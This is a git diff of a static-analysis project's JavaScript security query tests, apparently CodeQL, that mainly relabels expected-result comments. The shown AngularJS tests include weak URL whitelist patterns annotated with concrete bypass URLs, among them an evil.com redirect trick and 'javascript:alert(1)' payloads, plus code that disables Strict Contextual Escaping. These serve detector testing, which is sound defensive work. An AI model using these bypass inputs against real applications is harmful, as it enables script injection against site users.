.../BackrefIntoNegativeLookahead/tst.js | 5 +- .../DuplicateCharacterInCharacterClass/tst.js | 4 +- .../RegExp/IdentityReplacement/tst.js | 26 +- .../query-tests/RegExp/MalformedRegExp/tst.js | 2 +- .../RegExp/RegExpAlwaysMatches/tst.js | 38 +-- .../query-tests/RegExp/UnboundBackref/tst.js | 17 +- .../RegExp/UnmatchableCaret/tst.js | 26 +- .../RegExp/UnmatchableDollar/tst.js | 31 +- .../tst-IncompleteHostnameRegExp.js | 6 +- .../IncompleteUrlSchemeCheck.js | 4 +- .../tst-IncompleteUrlSubstringSanitization.js | 4 +- .../CWE-020/IncorrectSuffixCheck/tst.js | 48 +-- .../CWE-020/MissingOriginCheck/tst.js | 6 +- .../tst-SemiAnchoredRegExp.js | 56 ++-- .../tst-UnanchoredUrlRegExp.js | 84 ++--- .../CWE-020/SuspiciousRegexpRange/tst.js | 34 +- .../CWE-022/TaintedPath/TaintedPath-es6.js | 3 +- .../CWE-022/TaintedPath/TaintedPath.js | 147 ++++----- .../TaintedPath/examples/TaintedPath.js | 3 +- .../TaintedPath/examples/TaintedPathGood.js | 2 +- .../CWE-022/TaintedPath/handlebars.js | 10 +- .../CWE-022/TaintedPath/normalizedPaths.js | 208 ++++++------ .../CWE-022/TaintedPath/other-fs-libraries.js | 48 +-- .../Security/CWE-022/TaintedPath/prettier.js | 4 +- .../CWE-022/TaintedPath/sharedlib-repro.js | 2 +- .../TaintedPath/tainted-access-paths.js | 20 +- .../TaintedPath/tainted-array-steps.js | 4 +- .../TaintedPath/tainted-promise-steps.js | 4 +- .../CWE-022/TaintedPath/tainted-require.js | 7 +- .../CWE-022/TaintedPath/tainted-sendFile.js | 21 +- .../TaintedPath/tainted-string-steps.js | 38 +-- .../Security/CWE-022/TaintedPath/torrents.js | 2 +- .../CWE-022/TaintedPath/typescript.ts | 15 +- .../Security/CWE-022/ZipSlip/ZipSlipBad.js | 2 +- .../Security/CWE-022/ZipSlip/ZipSlipGood.js | 4 +- .../query-tests/Security/CWE-073/routes.js | 2 +- .../test/query-tests/Security/CWE-073/tst.js | 16 +- .../test/query-tests/Security/CWE-073/tst2.js | 14 +- .../CWE-078/CommandInjection/actions.js | 4 +- .../CommandInjection/child_process-test.js | 60 ++-- .../CWE-078/CommandInjection/exec-sh.js | 2 +- .../CWE-078/CommandInjection/exec-sh2.js | 2 +- .../CWE-078/CommandInjection/execSeries.js | 2 +- .../CWE-078/CommandInjection/form-parsers.js | 14 +- .../CWE-078/CommandInjection/other.js | 40 +-- .../IndirectCommandInjection/actions.js | 10 +- ...ommand-line-parameter-command-injection.js | 76 ++--- .../second-order.js | 24 +- ...hell-command-injection-from-environment.js | 10 +- .../lib/isImported.js | 2 +- .../UnsafeShellCommandConstruction/lib/lib.js | 258 +++++++-------- .../lib/lib2.js | 4 +- .../lib/other.js | 2 +- .../lib/subLib/amdSub.js | 2 +- .../lib/subLib/index.js | 6 +- .../lib/subLib2/compiled-file.ts | 2 +- .../lib/subLib2/special-file.js | 2 +- .../lib/subLib3/my-file.ts | 2 +- .../lib/subLib4/subsub.js | 2 +- .../CWE-078/UselessUseOfCat/uselesscat.js | 98 +++--- .../CWE-079/DomBasedXss/addEventListener.js | 10 +- .../DomBasedXss/angular-tempate-url.js | 4 +- .../CWE-079/DomBasedXss/angular2-client.ts | 30 +- .../CWE-079/DomBasedXss/classnames.js | 16 +- .../Security/CWE-079/DomBasedXss/clipboard.ts | 12 +- .../CWE-079/DomBasedXss/custom-element.js | 2 +- .../Security/CWE-079/DomBasedXss/d3.js | 8 +- .../Security/CWE-079/DomBasedXss/dates.js | 34 +- .../CWE-079/DomBasedXss/dragAndDrop.ts | 10 +- .../Security/CWE-079/DomBasedXss/encodeuri.js | 2 +- .../DomBasedXss/event-handler-receiver.js | 2 +- .../Security/CWE-079/DomBasedXss/express.js | 5 +- .../Security/CWE-079/DomBasedXss/jquery.js | 42 +-- .../CWE-079/DomBasedXss/json-stringify.jsx | 8 +- .../CWE-079/DomBasedXss/jwt-server.js | 3 +- .../Security/CWE-079/DomBasedXss/jwt.js | 2 +- .../CWE-079/DomBasedXss/nodemailer.js | 4 +- .../CWE-079/DomBasedXss/optionalSanitizer.js | 22 +- .../CWE-079/DomBasedXss/pages/[id].jsx | 6 +- .../CWE-079/DomBasedXss/react-native.js | 4 +- .../CWE-079/DomBasedXss/react-use-context.js | 4 +- .../CWE-079/DomBasedXss/react-use-router.js | 10 +- .../CWE-079/DomBasedXss/react-use-state.js | 10 +- .../Security/CWE-079/DomBasedXss/sanitiser.js | 26 +- .../CWE-079/DomBasedXss/stored-xss.js | 16 +- .../DomBasedXss/string-manipulations.js | 22 +- .../tainted-url-suffix-arguments.js | 6 +- .../Security/CWE-079/DomBasedXss/tooltip.jsx | 10 +- .../Security/CWE-079/DomBasedXss/translate.js | 5 +- .../CWE-079/DomBasedXss/trusted-types.js | 6 +- .../Security/CWE-079/DomBasedXss/tst.js | 279 ++++++++-------- .../Security/CWE-079/DomBasedXss/tst3.js | 16 +- .../Security/CWE-079/DomBasedXss/typeahead.js | 2 +- .../various-concat-obfuscations.js | 20 +- .../Security/CWE-079/ExceptionXss/ajv.js | 4 +- .../CWE-079/ExceptionXss/exception-xss.js | 54 +-- .../CWE-079/ReflectedXss/ReflectedXss.js | 47 ++- .../ReflectedXss/ReflectedXssContentTypes.js | 18 +- .../CWE-079/ReflectedXss/ReflectedXssGood.js | 14 +- .../CWE-079/ReflectedXss/ReflectedXssGood3.js | 8 +- .../Security/CWE-079/ReflectedXss/cookies.js | 2 +- .../CWE-079/ReflectedXss/formatting.js | 6 +- .../CWE-079/ReflectedXss/live-server.js | 4 +- .../Security/CWE-079/ReflectedXss/partial.js | 10 +- .../Security/CWE-079/ReflectedXss/promises.js | 4 +- .../Security/CWE-079/ReflectedXss/tst2.js | 32 +- .../Security/CWE-079/ReflectedXss/tst3.js | 4 +- .../StoredXss/xss-through-filenames.js | 8 +- .../CWE-079/StoredXss/xss-through-torrent.js | 2 +- .../UnsafeHtmlConstruction/jquery-plugin.js | 6 +- .../UnsafeHtmlConstruction/lib/src/MyNode.ts | 2 +- .../UnsafeHtmlConstruction/lib2/index.ts | 6 +- .../UnsafeHtmlConstruction/lib2/src/MyNode.ts | 2 +- .../CWE-079/UnsafeHtmlConstruction/main.js | 42 +-- .../CWE-079/UnsafeHtmlConstruction/typed.ts | 6 +- .../unsafe-jquery-plugin.js | 96 +++--- .../Security/CWE-079/XssThroughDom/angular.ts | 14 +- .../Security/CWE-079/XssThroughDom/forms.js | 24 +- .../CWE-079/XssThroughDom/xss-through-dom.js | 84 ++--- .../CWE-089/local-threat-source/test.js | 2 +- .../Security/CWE-089/typed/typedClient.ts | 6 +- .../Security/CWE-089/untyped/graphql.js | 26 +- .../CWE-089/untyped/html-sanitizer.js | 2 +- .../CWE-089/untyped/json-schema-validator.js | 16 +- .../Security/CWE-089/untyped/koarouter.js | 2 +- .../Security/CWE-089/untyped/ldap.js | 14 +- .../CWE-089/untyped/marsdb-flow-to.js | 3 +- .../Security/CWE-089/untyped/marsdb.js | 3 +- .../Security/CWE-089/untyped/minimongo.js | 3 +- .../Security/CWE-089/untyped/mongodb.js | 31 +- .../CWE-089/untyped/mongodb_bodySafe.js | 5 +- .../Security/CWE-089/untyped/mongoose.js | 138 ++++---- .../CWE-089/untyped/mongooseJsonParse.js | 3 +- .../CWE-089/untyped/mongooseModelClient.js | 6 +- .../Security/CWE-089/untyped/mysql.js | 6 +- .../CWE-089/untyped/pg-promise-types.ts | 2 +- .../Security/CWE-089/untyped/pg-promise.js | 48 +-- .../Security/CWE-089/untyped/redis.js | 26 +- .../Security/CWE-089/untyped/tst2.js | 5 +- .../Security/CWE-089/untyped/tst3.js | 4 +- .../CodeInjection/NoSQLCodeInjection.js | 8 +- .../Security/CWE-094/CodeInjection/actions.js | 2 +- .../CWE-094/CodeInjection/angularjs.js | 42 +-- .../CodeInjection/bad-code-sanitization.js | 22 +- .../Security/CWE-094/CodeInjection/express.js | 29 +- .../CWE-094/CodeInjection/lib/index.js | 28 +- .../Security/CWE-094/CodeInjection/module.js | 4 +- .../CWE-094/CodeInjection/react-native.js | 4 +- .../CWE-094/CodeInjection/template-sinks.js | 28 +- .../Security/CWE-094/CodeInjection/tst.js | 33 +- .../CWE-094/CodeInjection/webix/webix.html | 6 +- .../CWE-094/CodeInjection/webix/webix.js | 6 +- .../UnsafeDynamicMethodAccess/example.js | 2 +- .../CWE-094/UnsafeDynamicMethodAccess/tst.js | 10 +- .../Security/CWE-1004/tst-httpOnly.js | 74 ++--- .../Security/CWE-116/BadTagFilter/tst.js | 44 +-- .../Security/CWE-116/DoubleEscaping/tst.js | 6 +- .../UnsafeHtmlExpansion.js | 24 +- .../tst-multi-character-sanitization.js | 119 ++++--- .../CWE-116/IncompleteSanitization/tst.js | 214 ++++++------ .../Security/CWE-117/logInjectionBad.js | 46 +-- .../Security/CWE-117/logInjectionGood.js | 10 +- .../Security/CWE-1275/tst-sameSite.js | 30 +- .../test/query-tests/Security/CWE-134/tst.js | 44 +-- .../test/query-tests/Security/CWE-178/tst.js | 14 +- .../Security/CWE-200/bufferRead.js | 3 +- .../Security/CWE-200/express-send-file.js | 2 +- .../Security/CWE-200/googlecompiler.js | 5 +- .../query-tests/Security/CWE-200/lib/tst.js | 6 +- .../Security/CWE-200/private-file-exposure.js | 26 +- .../Security/CWE-200/readFileSync.js | 3 +- .../Security/CWE-200/readStreamRead.js | 3 +- .../query-tests/Security/CWE-200/request.js | 4 +- .../Security/CWE-200/sentAsHeaders.js | 4 +- .../Security/CWE-201/PostMessageStar2.js | 8 +- .../test/query-tests/Security/CWE-209/node.js | 4 +- .../test/query-tests/Security/CWE-209/tst.js | 12 +- .../test/query-tests/Security/CWE-295/tst.js | 44 +-- .../Security/CWE-312/CleartextStorage.js | 3 +- .../Security/CWE-312/CleartextStorageGood.js | 2 +- .../Security/CWE-312/build-leaks.js | 14 +- .../query-tests/Security/CWE-312/passwords.js | 124 +++---- .../Security/CWE-312/tst-angularjs.js | 14 +- .../test/query-tests/Security/CWE-326/tst.js | 38 +-- .../Security/CWE-327/bad-random.js | 42 +-- .../test/query-tests/Security/CWE-327/tst.js | 14 +- .../test/query-tests/Security/CWE-338/tst.js | 52 +-- .../test/query-tests/Security/CWE-346/tst.js | 22 +- .../query-tests/Security/CWE-347/bad-jwt.js | 8 +- .../Security/CWE-352/csurf_api_example.js | 2 +- .../Security/CWE-352/csurf_example.js | 4 +- .../query-tests/Security/CWE-352/fastify.js | 2 +- .../query-tests/Security/CWE-352/fastify2.js | 2 +- .../Security/CWE-352/lusca_example.js | 6 +- .../test/query-tests/Security/CWE-352/tst.js | 2 +- .../test/query-tests/Security/CWE-367/tst.js | 12 +- .../CWE-377/insecure-temporary-file.js | 16 +- .../test/query-tests/Security/CWE-384/tst.js | 6 +- .../DeepObjectResourceExhaustion/tst.js | 2 +- .../Security/CWE-400/ReDoS/jsonschema.js | 6 +- .../Security/CWE-400/ReDoS/lib/closure.js | 2 +- .../Security/CWE-400/ReDoS/lib/indirect.js | 2 +- .../Security/CWE-400/ReDoS/lib/lib.js | 14 +- .../CWE-400/ReDoS/lib/moduleLib/moduleLib.js | 2 +- .../ReDoS/lib/otherLib/js/src/index.js | 2 +- .../Security/CWE-400/ReDoS/lib/snapdragon.js | 6 +- .../CWE-400/ReDoS/lib/subLib4/factory.js | 2 +- .../CWE-400/ReDoS/lib/subLib5/feature.js | 2 +- .../CWE-400/ReDoS/lib/subLib5/main.js | 2 +- .../CWE-400/ReDoS/lib/subLib5/subclass.js | 2 +- .../CWE-400/ReDoS/lib/subLib6/index.js | 2 +- .../CWE-400/ReDoS/lib/sublib/factory.js | 2 +- .../CWE-400/ReDoS/polynomial-redos.js | 196 +++++------ .../query-tests/Security/CWE-400/ReDoS/tst.js | 308 +++++++----------- .../CWE-400/RemovePropertyInjection/tst.js | 12 +- .../RemovePropertyInjection/tstNonExpr.js | 4 +- .../test/query-tests/Security/CWE-502/tst.js | 30 +- .../test/query-tests/Security/CWE-506/tst.js | 8 +- .../CWE-522-DecompressionBombs/fflate.js | 5 +- .../test/query-tests/Security/CWE-598/tst.js | 12 +- .../CWE-601/ClientSideUrlRedirect/react.js | 8 +- .../ClientSideUrlRedirect/regexp-exec.js | 16 +- .../ClientSideUrlRedirect/sanitizer.js | 24 +- .../CWE-601/ClientSideUrlRedirect/tst.js | 11 +- .../CWE-601/ClientSideUrlRedirect/tst10.js | 12 +- .../CWE-601/ClientSideUrlRedirect/tst11.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst13.js | 40 +-- .../CWE-601/ClientSideUrlRedirect/tst14.js | 4 +- .../CWE-601/ClientSideUrlRedirect/tst15.js | 22 +- .../CWE-601/ClientSideUrlRedirect/tst2.js | 3 +- .../CWE-601/ClientSideUrlRedirect/tst3.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst4.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst5.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst6.js | 9 +- .../CWE-601/ClientSideUrlRedirect/tst7.js | 6 +- .../CWE-601/ClientSideUrlRedirect/tst8.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst9.js | 3 +- .../CWE-601/ClientSideUrlRedirect/typed.ts | 8 +- .../ServerSideUrlRedirect.js | 3 +- .../ServerSideUrlRedirectGood.js | 2 +- .../ServerSideUrlRedirectGood2.js | 2 +- .../CWE-601/ServerSideUrlRedirect/express.js | 82 ++--- .../CWE-601/ServerSideUrlRedirect/koa.js | 16 +- .../CWE-601/ServerSideUrlRedirect/next.ts | 2 +- .../CWE-601/ServerSideUrlRedirect/node.js | 14 +- .../ServerSideUrlRedirect/react-native.js | 4 +- .../query-tests/Security/CWE-611/closure.js | 2 +- .../query-tests/Security/CWE-611/domparser.js | 8 +- .../query-tests/Security/CWE-611/expat.js | 2 +- .../query-tests/Security/CWE-611/libxml.js | 2 +- .../Security/CWE-611/libxml.noent.js | 12 +- .../Security/CWE-614/tst-cleartextCookie.js | 62 ++-- .../test/query-tests/Security/CWE-640/tst.js | 8 +- .../Security/CWE-643/XpathInjectionBad.js | 3 +- .../Security/CWE-643/XpathInjectionGood.js | 2 +- .../test/query-tests/Security/CWE-643/tst.js | 8 +- .../test/query-tests/Security/CWE-643/tst2.js | 4 +- .../Security/CWE-693/InsecureHelmetBad.js | 4 +- .../Security/CWE-693/InsecureHelmetGood.js | 2 +- .../Security/CWE-730/RegExpInjection.js | 61 ++-- .../Security/CWE-730/RegExpInjectionGood.js | 2 +- .../Security/CWE-730/server-crash.js | 46 +-- .../test/query-tests/Security/CWE-730/tst.js | 2 +- .../CWE-754/UnsafeDynamicMethodAccess.js | 10 +- .../CWE-754/UnvalidatedDynamicMethodCall2.js | 2 +- .../CWE-754/UnvalidatedDynamicMethodCall3.js | 2 +- .../UnvalidatedDynamicMethodCallGood.js | 2 +- .../UnvalidatedDynamicMethodCallGood3.js | 2 +- .../UnvalidatedDynamicMethodCallGood4.js | 4 +- .../test/query-tests/Security/CWE-754/tst.js | 30 +- .../Security/CWE-770/MissingRateLimit/tst.js | 44 +-- .../Security/CWE-770/MissingRateLimit/tst2.ts | 2 +- .../Security/CWE-770/MissingRateLimit/tst3.js | 2 +- .../Security/CWE-770/MissingRateLimit/tst4.js | 2 +- .../ResourceExhaustion_timeout.js | 2 +- .../ResourceExhaustion_timeout_fixed.js | 2 +- .../ResourceExhaustion/resource-exhaustion.js | 96 +++--- .../query-tests/Security/CWE-776/closure.js | 3 +- .../query-tests/Security/CWE-776/domparser.js | 9 +- .../query-tests/Security/CWE-776/expat.js | 2 +- .../query-tests/Security/CWE-776/jquery.js | 3 +- .../query-tests/Security/CWE-776/libxml.js | 3 +- .../Security/CWE-776/libxml.noent.js | 3 +- .../Security/CWE-776/libxml.sax.js | 2 +- .../Security/CWE-776/libxml.saxpush.js | 2 +- .../Security/CWE-798/HardcodedCredentials.js | 160 ++++----- .../__tests__/HardcodedCredentialsDemo.js | 8 +- .../Security/CWE-807/example_bypass.js | 9 +- .../tst-different-kinds-comparison-bypass.js | 18 +- .../test/query-tests/Security/CWE-807/tst.js | 42 +-- .../Security/CWE-829/insecure-download.js | 20 +- .../DynamicCreationOfUntrustedSourceUse.html | 20 +- .../StaticCreationOfUntrustedSourceUse.html | 21 +- .../Security/CWE-834/LoopBoundInjectionBad.js | 8 +- .../CWE-834/LoopBoundInjectionExitBad.js | 8 +- .../CWE-834/LoopBoundInjectionExitGood.js | 8 +- .../CWE-834/LoopBoundInjectionGood.js | 8 +- .../CWE-834/LoopBoundInjectionLodash.js | 2 +- .../LoopBoundInjectionObviousLengthCheck.js | 2 +- .../LoopBoundInjectionObviousNullPointer.js | 10 +- ...jectionObviousNullPointerInPreviousLoop.js | 4 +- .../test/query-tests/Security/CWE-843/tst.js | 66 ++-- .../test/query-tests/Security/CWE-912/tst.js | 10 +- .../PrototypePollutingAssignment/lib.js | 30 +- .../otherlib/src/otherlibimpl.js | 2 +- .../sublib/other.js | 2 +- .../sublib/sub.js | 2 +- .../PrototypePollutingAssignment/tst.js | 60 ++-- .../path-assignment.js | 10 +- .../PrototypePollutingFunction/tests.js | 92 +++--- .../angularmerge.js | 2 +- .../src-non-vulnerable-lodash/tst.js | 2 +- .../src-vulnerable-lodash/tst.js | 8 +- .../webix/webix.html | 4 +- .../webix/webix.js | 4 +- .../test/query-tests/Security/CWE-916/tst.js | 8 +- .../Security/CWE-918/clientSide.js | 14 +- .../Security/CWE-918/serverSide.js | 54 +-- .../Statements/EphemeralLoop/tst.js | 10 +- .../Statements/IgnoreArrayResult/tst.js | 4 +- .../Statements/ImplicitReturn/tst.js | 25 +- .../InconsistentLoopOrientation/tst.js | 13 +- .../LoopIterationSkippedDueToShifting/tst.js | 12 +- .../Statements/NestedLoopsSameVariable/tst.js | 5 +- .../Statements/ReturnAssignsLocal/tst.js | 18 +- .../Statements/ReturnOutsideFunction/tst.js | 3 +- .../tst.js | 41 ++- .../UnreachableStatement/typealias.ts | 2 +- .../UseOfReturnlessFunction/tst.html | 2 +- .../Statements/UseOfReturnlessFunction/tst.js | 30 +- .../UseOfReturnlessFunction/tst2.ts | 2 +- .../UselessComparisonTest/constant.js | 4 +- .../UselessComparisonTest/defaults.js | 6 +- .../UselessComparisonTest/implicitReturn.js | 2 +- .../UselessConditional/UselessConditional.js | 56 ++-- .../UselessConditionalGood.js | 38 +-- javascript/ql/test/query-tests/Vue/tst.js | 16 +- .../external/DuplicateFunction/d/tst.js | 2 +- 536 files changed, 4420 insertions(+), 4774 deletions(-) diff --git a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js index d8616c9e2399..58b700a4c3f2 100644 --- a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js @@ -1,50 +1,50 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on('destroy', cleanup); // BAD + $scope.$on('destroy', cleanup); // $ Alert }) .controller('MyController', ["$scope", function(s) { - s.$on('destroy', cleanup); // BAD + s.$on('destroy', cleanup); // $ Alert }]) .controller('MyController', function($scope) { var destroy = 'destroy'; - $scope.$on(destroy, cleanup); // BAD + $scope.$on(destroy, cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$destroy', cleanup); // GOOD + $scope.$on('$destroy', cleanup); }) .controller('MyController', function($scope) { $scope.$emit('foo'); - $scope.$on('foo', cleanup); // GOOD + $scope.$on('foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('bar', cleanup); // BAD + $scope.$on('bar', cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$locationChangeStart', cleanup); // OK + $scope.$on('$locationChangeStart', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib1.foo', cleanup); // OK + $scope.$on('lib1.foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib2:foo', cleanup); // OK + $scope.$on('lib2:foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('onClick', cleanup); // OK + $scope.$on('onClick', cleanup); }) .controller('MyController', function($scope) { function f($scope){ $scope.$emit('probablyFromUserCode1') } - $scope.$on('probablyFromUserCode1', cleanup); // OK + $scope.$on('probablyFromUserCode1', cleanup); }) .controller('MyController', function($scope) { function f($scope){ var scope = $scope; scope.$emit('probablyFromUserCode2') } - $scope.$on('probablyFromUserCode2', cleanup); // OK + $scope.$on('probablyFromUserCode2', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('event-from-AngularJS-expression', cleanup); // GOOD + $scope.$on('event-from-AngularJS-expression', cleanup); }) ; diff --git a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js index c60a937b4c45..3afff0e3a50b 100644 --- a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js @@ -1,36 +1,36 @@ angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // NOT OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // $ Alert angular.module('app2') - .directive('mydirective', [ '$compile', function($compile, $http) { // NOT OK + .directive('mydirective', [ '$compile', function($compile, $http) { // $ Alert // ... }]); angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); // OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); angular.module('app2') - .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // OK + .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // ... }]); angular.module('app3', []) - .run(function(dep1, dep3) {}); // OK + .run(function(dep1, dep3) {}); angular.module('app4') - .directive('mydirective', function($compile, $http) { // OK + .directive('mydirective', function($compile, $http) { // ... }); angular.module('app5') - .directive('mydirective', [ 'fully.qualified.name', function(name) { // OK + .directive('mydirective', [ 'fully.qualified.name', function(name) { // ... }]) angular.module('app6') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js index 2ef8930246f9..312af00754e6 100644 --- a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js +++ b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js @@ -1,17 +1,17 @@ angular.module('app', []) .config(function($sceProvider) { - $sceProvider.enabled(false); // BAD + $sceProvider.enabled(false); // $ Alert }) .config(['otherProvider', function($sceProvider) { - $sceProvider.enabled(false); // OK + $sceProvider.enabled(false); }]) .config(['$sceProvider', function(x) { - x.enabled(false); // BAD + x.enabled(false); // $ Alert }]) .config(function($sceProvider) { - $sceProvider.enabled(true); // OK + $sceProvider.enabled(true); }) .config(function($sceProvider) { var x = false; - $sceProvider.enabled(x); // BAD + $sceProvider.enabled(x); // $ Alert }); diff --git a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js index 51dbd1f76d48..c3855f207c04 100644 --- a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js +++ b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js @@ -11,68 +11,68 @@ angular.module('myModule', []) ; angular.module('myModule2', []) - .controller('c0', function(factoryId){}) // OK - .controller('c1', function(serviceId){}) // OK - .controller('c2', function(valueId){}) // OK - .controller('c3', function(constantId){}) // OK - .controller('c4', function(providerId){}) // OK - .controller('c5', function($http){}) // OK - .controller('c6', function($provider){}) // NOT OK - .controller('c7', function($scope){}) // OK - .controller('c8', function($compile){}) // OK - .controller('c9', function(UNKNOWN){}) // OK - .controller('c10', function(providerIdProvider){}) // NOT OK - .controller('c11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .controller('c12', function($provide){}) // OK (special case) - .controller('c13', function(providerId2Provider){}) // NOT OK + .controller('c0', function(factoryId){}) + .controller('c1', function(serviceId){}) + .controller('c2', function(valueId){}) + .controller('c3', function(constantId){}) + .controller('c4', function(providerId){}) + .controller('c5', function($http){}) + .controller('c6', function($provider){}) // $ Alert + .controller('c7', function($scope){}) + .controller('c8', function($compile){}) + .controller('c9', function(UNKNOWN){}) + .controller('c10', function(providerIdProvider){}) // $ Alert + .controller('c11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .controller('c12', function($provide){}) // OK - special case + .controller('c13', function(providerId2Provider){}) // $ Alert - .factory('s0', function(factoryId){}) // OK - .factory('s1', function(serviceId){}) // OK - .factory('s2', function(valueId){}) // OK - .factory('s3', function(constantId){}) // OK - .factory('s4', function(providerId){}) // OK - .factory('s5', function($http){}) // OK - .factory('s6', function($provider){}) // NOT OK - .factory('s7', function($scope){}) // NOT OK - .factory('s8', function($compile){}) // OK - .factory('s9', function(UNKNOWN){}) // OK - .factory('s10', function(providerIdProvider){}) // NOT OK - .factory('s11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .factory('s12', function($provide){}) // OK (special case) - .factory('s13', function(providerId2Provider){}) // NOT OK + .factory('s0', function(factoryId){}) + .factory('s1', function(serviceId){}) + .factory('s2', function(valueId){}) + .factory('s3', function(constantId){}) + .factory('s4', function(providerId){}) + .factory('s5', function($http){}) + .factory('s6', function($provider){}) // $ Alert + .factory('s7', function($scope){}) // $ Alert + .factory('s8', function($compile){}) + .factory('s9', function(UNKNOWN){}) + .factory('s10', function(providerIdProvider){}) // $ Alert + .factory('s11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .factory('s12', function($provide){}) // OK - special case + .factory('s13', function(providerId2Provider){}) // $ Alert - .run(function(factoryId){}) // OK - .run(function(serviceId){}) // OK - .run(function(valueId){}) // OK - .run(function(constantId){}) // OK - .run(function(providerId){}) // OK - .run(function($http){}) // OK - .run(function($provider){}) // NOT OK - .run(function($scope){}) // NOT OK - .run(function($compile){}) // OK - .run(function(UNKNOWN){}) // OK - .run(function(providerIdProvider){}) // NOT OK - .run(function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .run(function($provide){}) // OK (special case) - .run(function(providerId2Provider){}) // NOT OK + .run(function(factoryId){}) + .run(function(serviceId){}) + .run(function(valueId){}) + .run(function(constantId){}) + .run(function(providerId){}) + .run(function($http){}) + .run(function($provider){}) // $ Alert + .run(function($scope){}) // $ Alert + .run(function($compile){}) + .run(function(UNKNOWN){}) + .run(function(providerIdProvider){}) // $ Alert + .run(function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .run(function($provide){}) // OK - special case + .run(function(providerId2Provider){}) // $ Alert - .config(function(factoryId){}) // NOT OK - .config(function(serviceId){}) // NOT OK - .config(function(valueId){}) // NOT OK - .config(function(constantId){}) // OK - .config(function(providerId){}) // NOT OK - .config(function($http){}) // NOT OK - .config(function($provider){}) // OK - .config(function($scope){}) // NOT OK - .config(function($compile){}) // OK - .config(function(UNKNOWN){}) // OK - .config(function(providerIdProvider){}) // OK - .config(function(providerId, UNKNOWN){}) // NOT OK, but only one error - .config(function($provide){}) // OK (special case) - .config(function(valueId2){}) // NOT OK + .config(function(factoryId){}) // $ Alert + .config(function(serviceId){}) // $ Alert + .config(function(valueId){}) // $ Alert + .config(function(constantId){}) + .config(function(providerId){}) // $ Alert + .config(function($http){}) // $ Alert + .config(function($provider){}) + .config(function($scope){}) // $ Alert + .config(function($compile){}) + .config(function(UNKNOWN){}) + .config(function(providerIdProvider){}) + .config(function(providerId, UNKNOWN){}) // $ Alert - but only one error + .config(function($provide){}) // OK - special case + .config(function(valueId2){}) // $ Alert // service: same restrcitions as .factory - .service('s14', function(factoryId){}) // OK - .service('s15', function($provider){}) // NOT OK + .service('s14', function(factoryId){}) + .service('s15', function($provider){}) // $ Alert ; diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js index 713e36e52233..6ede37fed7cc 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js @@ -1,24 +1,24 @@ angular.module('myApp', []) .config(function($sceDelegateProvider) { $sceDelegateProvider.resourceUrlWhitelist([ - "**://example.com/*", // BAD (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) - "*://example.org/*", // BAD (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) - "https://**.example.com/*", // BAD (exploit: https://evil.com/?ignore=://example.com/a) - "https://example.**", // BAD (exploit: https://example.evil.com or http://example.:foo@evil.com) - "https://example.*", // BAD (exploit: https://example.UnexpectedTLD) + "**://example.com/*", // $ Alert - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) + "*://example.org/*", // $ Alert - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) + "https://**.example.com/*", // $ Alert - exploit: https://evil.com/?ignore=://example.com/a + "https://example.**", // $ Alert - exploit: https://example.evil.com or http://example.:foo@evil.com + "https://example.*", // $ Alert - exploit: https://example.UnexpectedTLD - "https://example.com", // OK - "https://example.com/**", // OK - "https://example.com/*", // OK - "https://example.com/foo/*", // OK - "https://example.com/foo/**", // OK - 